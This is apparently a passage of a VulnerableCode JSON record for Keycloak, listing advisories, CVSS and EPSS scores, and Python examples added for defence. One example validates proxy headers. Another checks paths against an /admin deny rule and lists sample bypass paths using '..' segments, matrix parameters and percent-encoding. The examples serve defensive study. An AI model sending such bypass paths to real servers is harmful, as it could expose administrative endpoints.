url pkg:maven/org.keycloak/keycloak-quarkus-server@26.0.6
purl pkg:maven/org.keycloak/keycloak-quarkus-server@26.0.6
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-13cd-jace-rfdu
1
vulnerability VCID-a1me-1k15-2kdt
2
vulnerability VCID-cax3-qsfb-yfc9
3
vulnerability VCID-hq42-c3pr-qkbf
4
vulnerability VCID-vtut-sg7s-xqf4
5
vulnerability VCID-wgaj-esqz-27fk
6
vulnerability VCID-zv3y-skx5-53ge
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.keycloak/keycloak-quarkus-server@26.0.6
aliases CVE-2024-10973, GHSA-g6qq-c9f9-2772
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-pewx-mrx1-7ke6
9
url VCID-rhzn-51yv-q7ef
vulnerability_id VCID-rhzn-51yv-q7ef
summary
Duplicate Advisory: Keycloak proxy header handling Denial-of-Service (DoS) vulnerability
## Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-jgwc-jh89-rpgq. This link is maintained to preserve external references.

## Original Description
A vulnerability was found in the Keycloak Server. The Keycloak Server is vulnerable to a denial of service (DoS) attack due to improper handling of proxy headers. When Keycloak is configured to accept incoming proxy headers, it may accept non-IP values, such as obfuscated identifiers, without proper validation. This issue can lead to costly DNS resolution operations, which an attacker could exploit to tie up IO threads and potentially cause a denial of service.
The attacker must have access to send requests to a Keycloak instance that is configured to accept proxy headers, specifically when reverse proxies do not overwrite incoming headers, and Keycloak is configured to trust these headers.
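The validation the description calls for, as an added example (not Keycloak's code): derive the client address from X-Forwarded-For while accepting only IP literals, so a hostname or an RFC 7239-style obfuscated identifier such as `_hidden` can never reach a resolver. The header values and the trusted proxy address are constructed samples.

```python
"""Added example (not Keycloak's code): take the client address from
X-Forwarded-For without ever resolving a name.  Only IP literals are
accepted; anything else (hostnames, obfuscated identifiers like `_hidden`)
is recorded and never handed to DNS, so request content cannot trigger a
lookup.  Header values below are constructed samples."""
import ipaddress
from typing import Optional


def parse_ip(token: str) -> Optional[str]:
    """Return the normalised IP literal, or None if `token` is not one."""
    literal = token[1:-1] if token.startswith("[") and token.endswith("]") else token
    try:
        return str(ipaddress.ip_address(literal))
    except ValueError:
        return None  # not an IP: never passed to a resolver


def split_forwarded_for(header: str) -> tuple:
    """Return (accepted_ips, rejected_tokens) for a comma-separated header."""
    accepted, rejected = [], []
    for token in (t.strip() for t in header.split(",")):
        if not token:
            continue
        addr = parse_ip(token)
        (accepted if addr is not None else rejected).append(addr or token)
    return accepted, rejected


def client_ip(header: str, trusted_proxies: set) -> Optional[str]:
    """Walk right-to-left past our own proxies; the first address we did not
    add ourselves is the client.  If that token is not an IP, the header was
    not overwritten by a trusted proxy, so return None and let the caller
    fall back to the socket peer address."""
    for token in reversed([t.strip() for t in header.split(",") if t.strip()]):
        addr = parse_ip(token)
        if addr is None:
            return None
        if addr in trusted_proxies:
            continue
        return addr
    return None


TRUSTED = {"10.0.0.5"}  # constructed: the address of our own reverse proxy

SAMPLE_HEADERS = [
    "203.0.113.9, 10.0.0.5",                        # normal: client, then our proxy
    "_hidden, 10.0.0.5",                            # obfuscated identifier, no IP
    "lookup-me.example, 203.0.113.9, 10.0.0.5",     # client-supplied junk on the left
    "[2001:db8::1], 10.0.0.5",                      # bracketed IPv6 literal
]

if __name__ == "__main__":
    for h in SAMPLE_HEADERS:
        print(f"{h:45} -> {client_ip(h, TRUSTED)!r}  rejected={split_forwarded_for(h)[1]}")
```

Tokens to the left of the rightmost untrusted address are ignored rather than parsed, because anything there was supplied by the client and carries no information the proxy vouched for.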
references
0
reference_url https://access.redhat.com/errata/RHSA-2024:10175
reference_id
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2024:10175
1
reference_url https://access.redhat.com/errata/RHSA-2024:10176
reference_id
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2024:10176
2
reference_url https://access.redhat.com/errata/RHSA-2024:10177
reference_id
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2024:10177
3
reference_url https://access.redhat.com/errata/RHSA-2024:10178
reference_id
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2024:10178
4
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2317440
reference_id
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://bugzilla.redhat.com/show_bug.cgi?id=2317440
5
reference_url https://access.redhat.com/security/cve/CVE-2024-9666
reference_id CVE-2024-9666
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/security/cve/CVE-2024-9666
6
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-9666
reference_id CVE-2024-9666
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-9666
7
reference_url https://github.com/advisories/GHSA-pcx7-8hxg-j823
reference_id GHSA-pcx7-8hxg-j823
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-pcx7-8hxg-j823
fixed_packages
0
url pkg:maven/org.keycloak/keycloak-quarkus-server@26.0.6
purl pkg:maven/org.keycloak/keycloak-quarkus-server@26.0.6
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-13cd-jace-rfdu
1
vulnerability VCID-a1me-1k15-2kdt
2
vulnerability VCID-cax3-qsfb-yfc9
3
vulnerability VCID-hq42-c3pr-qkbf
4
vulnerability VCID-vtut-sg7s-xqf4
5
vulnerability VCID-wgaj-esqz-27fk
6
vulnerability VCID-zv3y-skx5-53ge
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.keycloak/keycloak-quarkus-server@26.0.6
aliases GHSA-pcx7-8hxg-j823
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-rhzn-51yv-q7ef
10
url VCID-vtut-sg7s-xqf4
vulnerability_id VCID-vtut-sg7s-xqf4
summary
Keycloak has an improper input validation vulnerability
A flaw was found in Keycloak. This improper input validation vulnerability occurs because Keycloak accepts RFC-compliant matrix parameters in URL path segments, while common reverse proxy configurations may ignore or mishandle them. A remote attacker can craft requests to mask path segments, potentially bypassing proxy-level path filtering. This could expose administrative or sensitive endpoints that operators believe are not externally reachable.
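This advisory and the earlier /admin path-exposure one (VCID-cax3-qsfb-yfc9) describe two ways a literal prefix rule at a proxy can disagree with the path the origin actually serves: unresolved `..` segments and `;k=v` matrix parameters. The following added example (not Keycloak's, HAProxy's or any vendor's code) canonicalises the path before applying the deny rule and lists the requests the literal rule misses. The sample paths are constructed illustrations of those two classes, not reproduced proof-of-concept requests; whether a given proxy is affected depends on its own configuration.

```python
"""Added example (not Keycloak, HAProxy or any vendor's code): normalise a
request path the way an origin server would *before* applying a proxy-style
deny rule for /admin, so segment tricks cannot hide the target path.
The sample paths are constructed illustrations of the two classes the
advisories describe (non-normalized `..` segments and `;k=v` matrix
parameters); whether a given proxy is affected depends on its own config."""
from urllib.parse import unquote

ADMIN_PREFIX = "/admin"


def naive_is_admin(raw_path: str) -> bool:
    """Literal prefix match on the raw path, as a simple proxy ACL might do."""
    return raw_path == ADMIN_PREFIX or raw_path.startswith(ADMIN_PREFIX + "/")


def normalize_path(raw_path: str) -> str:
    """Canonicalise a path for a deny-list decision.

    Deliberately conservative (better to block too much than let /admin through):
      1. drop the query string,
      2. percent-decode once (so %61dmin -> admin),
      3. strip matrix parameters (';k=v') from each segment,
      4. resolve '.' and '..', and collapse empty segments ('//').
    """
    path = unquote(raw_path.split("?", 1)[0])
    out = []
    for seg in path.split("/"):
        seg = seg.split(";", 1)[0]  # matrix params belong to the segment; drop them
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()
            continue
        out.append(seg)
    return "/" + "/".join(out)


def hardened_is_admin(raw_path: str) -> bool:
    """Same rule as naive_is_admin, applied to the canonical path."""
    return naive_is_admin(normalize_path(raw_path))


def find_bypasses(paths) -> list:
    """Return the paths the literal rule misses but the canonical rule catches."""
    return [p for p in paths if hardened_is_admin(p) and not naive_is_admin(p)]


# Constructed sample requests, not captured traffic.
SAMPLE_PATHS = [
    "/admin/master/console/",                      # plainly admin
    "/realms/master/protocol/openid-connect/auth",  # legitimately exposed
    "/realms/master/../../admin/master/console/",   # '..' walks out of /realms
    "/admin;x=1/master/console/",                   # matrix param hides the segment
    "/%61dmin/master/console/",                     # percent-encoded 'a'
    "/realms/./../admin/",                          # mixed '.' and '..'
]

if __name__ == "__main__":
    for p in SAMPLE_PATHS:
        print(f"{p:48} naive={naive_is_admin(p)!s:5} hardened={hardened_is_admin(p)}")
```

The safer deployment choice the Keycloak guides already make is to not route /admin through the public proxy at all; where it must be reachable, compare the proxy's decision against the canonical form rather than the raw request line.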
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-0976.json
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-0976.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-0976
reference_id
reference_type
scores
0
value 0.00015
scoring_system epss
scoring_elements 0.03309
published_at 2026-06-09T12:55:00Z
1
value 0.00015
scoring_system epss
scoring_elements 0.0336
published_at 2026-06-05T12:55:00Z
2
value 0.00015
scoring_system epss
scoring_elements 0.03371
published_at 2026-06-06T12:55:00Z
3
value 0.00015
scoring_system epss
scoring_elements 0.0334
published_at 2026-06-07T12:55:00Z
4
value 0.00015
scoring_system epss
scoring_elements 0.03319
published_at 2026-06-08T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-0976
2
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2429869
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-15T14:44:09Z/
url https://bugzilla.redhat.com/show_bug.cgi?id=2429869
3
reference_url https://github.com/keycloak/keycloak
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak
4
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:
reference_id cpe:/a:redhat:build_keycloak:
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:
5
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:jbosseapxp
reference_id cpe:/a:redhat:jbosseapxp
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:jbosseapxp
6
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:jboss_enterprise_application_platform:8
reference_id cpe:/a:redhat:jboss_enterprise_application_platform:8
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:jboss_enterprise_application_platform:8
7
reference_url https://access.redhat.com/security/cve/CVE-2026-0976
reference_id CVE-2026-0976
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-15T14:44:09Z/
url https://access.redhat.com/security/cve/CVE-2026-0976
8
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-0976
reference_id CVE-2026-0976
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-0976
9
reference_url https://github.com/advisories/GHSA-v897-pv23-r8cw
reference_id GHSA-v897-pv23-r8cw
reference_type
scores
0
value LOW
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-v897-pv23-r8cw
fixed_packages
0
url pkg:maven/org.keycloak/keycloak-quarkus-server@26.3.0
purl pkg:maven/org.keycloak/keycloak-quarkus-server@26.3.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-a1me-1k15-2kdt
1
vulnerability VCID-cax3-qsfb-yfc9
2
vulnerability VCID-wgaj-esqz-27fk
3
vulnerability VCID-zv3y-skx5-53ge
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.keycloak/keycloak-quarkus-server@26.3.0
aliases CVE-2026-0976, GHSA-v897-pv23-r8cw
risk_score 1.6
exploitability 0.5
weighted_severity 3.3
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-vtut-sg7s-xqf4
11
url VCID-wgaj-esqz-27fk
vulnerability_id VCID-wgaj-esqz-27fk
summary
Duplicate
This advisory duplicates another.
references
0
reference_url https://access.redhat.com/errata/RHSA-2025:21370
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-11-13T18:01:03Z/
url https://access.redhat.com/errata/RHSA-2025:21370
1
reference_url https://access.redhat.com/errata/RHSA-2025:21371
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-11-13T18:01:03Z/
url https://access.redhat.com/errata/RHSA-2025:21371
2
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-11538.json
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-11538.json
3
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-11538
reference_id
reference_type
scores
0
value 0.00012
scoring_system epss
scoring_elements 0.017
published_at 2026-06-08T12:55:00Z
1
value 0.00012
scoring_system epss
scoring_elements 0.01708
published_at 2026-06-07T12:55:00Z
2
value 0.00012
scoring_system epss
scoring_elements 0.01702
published_at 2026-06-05T12:55:00Z
3
value 0.00013
scoring_system epss
scoring_elements 0.02336
published_at 2026-06-09T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-11538
4
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2402622
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-11-13T18:01:03Z/
url https://bugzilla.redhat.com/show_bug.cgi?id=2402622
5
reference_url https://github.com/keycloak/keycloak
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak
6
reference_url https://github.com/keycloak/keycloak/commit/9e98f2bf961f68853cea6fbec58b512ed8be7ca9
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-11-13T18:01:03Z/
url https://github.com/keycloak/keycloak/commit/9e98f2bf961f68853cea6fbec58b512ed8be7ca9
7
reference_url https://github.com/keycloak/keycloak/pull/43574
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-11-13T18:01:03Z/
url https://github.com/keycloak/keycloak/pull/43574
8
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:26.4::el9
reference_id cpe:/a:redhat:build_keycloak:26.4::el9
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:26.4::el9
9
reference_url https://access.redhat.com/security/cve/CVE-2025-11538
reference_id CVE-2025-11538
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-11-13T18:01:03Z/
url https://access.redhat.com/security/cve/CVE-2025-11538
10
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-11538
reference_id CVE-2025-11538
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-11538
11
reference_url https://github.com/advisories/GHSA-7m9g-pmxf-m9m8
reference_id GHSA-7m9g-pmxf-m9m8
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-7m9g-pmxf-m9m8
12
reference_url https://github.com/advisories/GHSA-j4vq-q93m-4683
reference_id GHSA-j4vq-q93m-4683
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-j4vq-q93m-4683
13
reference_url https://github.com/keycloak/keycloak/security/advisories/GHSA-j4vq-q93m-4683
reference_id GHSA-j4vq-q93m-4683
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak/security/advisories/GHSA-j4vq-q93m-4683
fixed_packages
0
url pkg:maven/org.keycloak/keycloak-quarkus-server@26.4.5
purl pkg:maven/org.keycloak/keycloak-quarkus-server@26.4.5
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-zv3y-skx5-53ge
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.keycloak/keycloak-quarkus-server@26.4.5
aliases CVE-2025-11538, GHSA-7m9g-pmxf-m9m8, GHSA-j4vq-q93m-4683
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-wgaj-esqz-27fk
12
url VCID-yqk6-r6s5-myae
vulnerability_id VCID-yqk6-r6s5-myae
summary
Keycloak Build Process Exposes Sensitive Data
A flaw was found in Keycloak. This issue occurs because sensitive runtime values, such as passwords, may be captured during the Keycloak build process and embedded as default values in bytecode, leading to unintended information disclosure. In Keycloak 26, sensitive data specified directly in environment variables during the build process is also stored as default values, making it accessible at runtime. Indirect usage of environment variables for SPI options and Quarkus properties is also vulnerable due to unconditional expansion by PropertyMapper logic, capturing sensitive data as default values in all Keycloak versions up to 26.0.2.
references
0
reference_url https://access.redhat.com/errata/RHSA-2024:10175
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value 8.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-25T16:00:10Z/
url https://access.redhat.com/errata/RHSA-2024:10175
1
reference_url https://access.redhat.com/errata/RHSA-2024:10176
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value 8.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-25T16:00:10Z/
url https://access.redhat.com/errata/RHSA-2024:10176
2
reference_url https://access.redhat.com/errata/RHSA-2024:10177
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value 8.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-25T16:00:10Z/
url https://access.redhat.com/errata/RHSA-2024:10177
3
reference_url https://access.redhat.com/errata/RHSA-2024:10178
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value 8.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-25T16:00:10Z/
url https://access.redhat.com/errata/RHSA-2024:10178
4
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-10451.json
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-10451.json
5
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-10451
reference_id
reference_type
scores
0
value 0.00121
scoring_system epss
scoring_elements 0.30675
published_at 2026-06-09T12:55:00Z
1
value 0.00121
scoring_system epss
scoring_elements 0.30757
published_at 2026-06-05T12:55:00Z
2
value 0.00121
scoring_system epss
scoring_elements 0.30723
published_at 2026-06-06T12:55:00Z
3
value 0.00121
scoring_system epss
scoring_elements 0.3069
published_at 2026-06-07T12:55:00Z
4
value 0.00121
scoring_system epss
scoring_elements 0.30658
published_at 2026-06-08T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-10451
6
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2322096
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value 8.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-25T16:00:10Z/
url https://bugzilla.redhat.com/show_bug.cgi?id=2322096
7
reference_url https://github.com/keycloak/keycloak
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value 8.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak
8
reference_url https://github.com/keycloak/keycloak/commit/198214310eb45b86707f823ccb5a2d65c814b528
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value 8.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak/commit/198214310eb45b86707f823ccb5a2d65c814b528
9
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:24
reference_id cpe:/a:redhat:build_keycloak:24
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:24
10
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:24::el9
reference_id cpe:/a:redhat:build_keycloak:24::el9
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:24::el9
11
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:26
reference_id cpe:/a:redhat:build_keycloak:26
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:26
12
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:26.0::el9
reference_id cpe:/a:redhat:build_keycloak:26.0::el9
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:26.0::el9
13
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:jboss_enterprise_application_platform:8
reference_id cpe:/a:redhat:jboss_enterprise_application_platform:8
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:jboss_enterprise_application_platform:8
14
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:red_hat_single_sign_on:7
reference_id cpe:/a:redhat:red_hat_single_sign_on:7
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:red_hat_single_sign_on:7
15
reference_url https://access.redhat.com/security/cve/CVE-2024-10451
reference_id CVE-2024-10451
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value 8.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-25T16:00:10Z/
url https://access.redhat.com/security/cve/CVE-2024-10451
16
